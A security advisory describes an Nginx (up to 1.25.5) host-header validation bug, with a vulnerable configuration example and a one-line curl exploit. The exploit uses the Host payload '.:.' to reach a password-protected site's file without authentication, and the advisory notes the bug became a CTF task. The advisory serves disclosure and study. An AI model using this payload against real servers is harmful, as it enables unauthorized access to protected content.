Nginx 1.25.5 Host Header Validation

2024.04.25
Credit: dhteam
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Nginx =< 1.25.5 $host variable validation bug ## Intro: In the "Host" header sent to Nginx web server you can't just insert a dot or something like that, because a filtering rules exists there. The ngx_http_validate_host function is responsible for filtering (https://github.com/nginx/nginx/blob/master/src/http/ngx_http_request.c#L2145). ## What it validates: + two dots in a row are not allowed + colon and everything after it are stripped off + if "Host" header starts with "[", then after "]" everything is deleted + path separators are not allowed + cannot send chars ≤ 0x20 and == 0x7f + if there is a dot at the end, it is removed + if after all deletions the host length is zero, error occurs ## The bug itself: dot_pos can be greater than host_len, if the last dot is included in the strip, then the last unstripped character (first dot in this case) is not deleted. So, if "Host" header payload is .:. , the colon and dot after it are stripped, but the first dot remains untouched and Nginx $host variable now contains only single dot character, what can't be done in the normal conditions. ## Vulnerable Nginx server configuration example: server { root /sites/$host; index index.html; server_name _; location / { try_files $uri $uri/ =404; } } server { server_name ""; location / { return 418 "I'm a teapot."; } } server { root /sites/protected-host.example.com; index flag.html; server_name protected-host.example.com; auth_basic "Protected File Storage"; auth_basic_user_file /.htpasswd; location / { try_files $uri $uri/ =404; } } ## Exploit (unauthorized access to password-protected host in this case): curl -H "Host: .:." http://protected-host.example.com/protected-host.example.com/flag.html P.S. The bug was sent to security-alert@nginx.org, but the Nginx dev team said that ngx_http_validate_host function is a filter against fools and not a security bug at all, so it was decided to make it as a task on CTF Tinkoff contest.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top